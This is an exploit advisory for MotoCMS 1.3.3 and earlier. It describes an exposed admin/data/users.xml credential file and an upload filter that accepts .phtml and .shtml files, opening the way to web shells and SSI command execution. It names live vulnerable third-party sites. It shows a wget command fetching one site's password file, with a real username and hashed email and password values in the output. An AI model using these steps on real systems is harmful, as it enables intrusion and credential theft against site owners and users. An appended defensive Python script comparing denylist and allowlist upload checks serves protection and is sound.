MotoCMS <=1.3.3 Password File disclosure & Code/Command execution

2013.01.09
Credit: AkaStep
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

I'm AkaStep, member of Inj3ct0r Team

=================================================
Software: MotoCMS
Official Site: http://www.motocms.com/
Vulns: MotoCMS <=1.3.3 Password File disclosure && Code/Command execution
Software license: Commercial
=================================================
About Software:
MotoCMS is an advanced Flash CMS that allows Flash developers and users with no programming skills to easily create stunning Flash websites.
=================================================
About vulns:
Design flaw.

Trouble N1: This software is prone to a password file disclosure vulnerability, because it fails to protect sensitive data from HTTP access.

Trouble N2: In this CMS some file types (php5, php) are not allowed to be uploaded, but .phtml and .shtml are allowed.
Using the 2nd issue it is possible to upload a shell (via .phtml), and it is also possible to execute server commands via the SSI #exec directive (if enabled on the server side), or to use the include directive, for example to read files.

Some Demos:
http://kattmodXls.com/admin/data/users.xml
http://www.atxcfc.ca/admin/data/users.xml
http://ustanoXvka-spb.ru/admin/data/users.xml

$ wget --user-agent="Mozilla Firefox 3 Gecko 12" http://kattmodels.com/admin/data/users.xml && cat user*.xml
--2013-01-09 06:10:11-- http://kattmodels.com/admin/data/users.xml
Resolving kattmodels.com (kattmodels.com)... 208.109.47.128
Connecting to kattmodels.com (kattmodels.com)|208.109.47.128|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 187 [application/xml]
Saving to: `users.xml'

100%[==============>] 187 --.-K/s in 0s

2013-01-09 06:10:16 (2.75 MB/s) - `users.xml' saved [187/187]

<?xml version="1.0" encoding="UTF-8"?>
<users>
<user id="1263066591" name="pmanoloutsos" email="cb6afd35d37afd07dfcfdcb45e80026b" password="38740d1f9877b41f784a0859604c2d3c"/>
</users>
=================================================
RANDOM QUOTE OF THE DAY: I want a guy with guts! LOOOOOOOL
=================================================
KUDOSSSSSSS:
packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net
securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com
securitylab.ru secunia.com securityhome.eu exploitsdownload.com
osvdb.com websecurity.com.ua 1337day.com

to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers
Also special thanks to: ottoman38 & HERO_AZE
=================================================
/AkaStep
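The upload check described under Trouble N2, next to an allowlist check, as an added example for defenders; it is not MotoCMS code and not from the advisory's author. The denylist is reconstructed from the advisory's wording (php and php5 refused); the allowlist contents, function names and sample file names are assumptions.

```python
import re

# Denylist as the advisory describes it: only php and php5 are refused.
# Reconstruction for illustration, not MotoCMS source; case handling is assumed.
DESCRIBED_DENYLIST = {"php", "php5"}

# Assumed allowlist for a media upload feature; trim it to what the site needs.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "swf", "flv", "mp3", "pdf"}

# Plain base name plus one or more extensions: no path separators, no
# leading dot, no trailing dot or space, no control characters.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+(?:\.[A-Za-z0-9]+)+")


def denylist_accepts(filename):
    """Model of the flawed check: look at the last extension only."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in DESCRIBED_DENYLIST


def allowlist_accepts(filename):
    """Accept only safe names whose every extension is on the allowlist.

    Every extension is checked because Apache mod_mime can act on any
    extension in a name, so "x.phtml.jpg" may still reach a PHP handler.
    """
    if not SAFE_NAME.fullmatch(filename):
        return False
    extensions = filename.lower().split(".")[1:]
    return all(ext in ALLOWED_EXTENSIONS for ext in extensions)


def filter_gaps(filenames):
    """Names the denylist lets through that the allowlist refuses."""
    return [n for n in filenames
            if denylist_accepts(n) and not allowlist_accepts(n)]


# Constructed sample upload names (not taken from any real site).
SAMPLES = ["banner.swf", "photo.JPG", "page.phtml", "page.shtml",
           "index.php", "index.PHP5", "note.phtml.jpg", "../evil.png"]

if __name__ == "__main__":
    for name in SAMPLES:
        print(f"{name:16} denylist={denylist_accepts(name)!s:5} "
              f"allowlist={allowlist_accepts(name)}")
    print("gaps:", filter_gaps(SAMPLES))
```

Filename checks are one layer only: the upload directory should also be served without PHP or SSI handlers, and admin/data/users.xml should not be reachable over HTTP at all.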

References:

http://www.motocms.com/

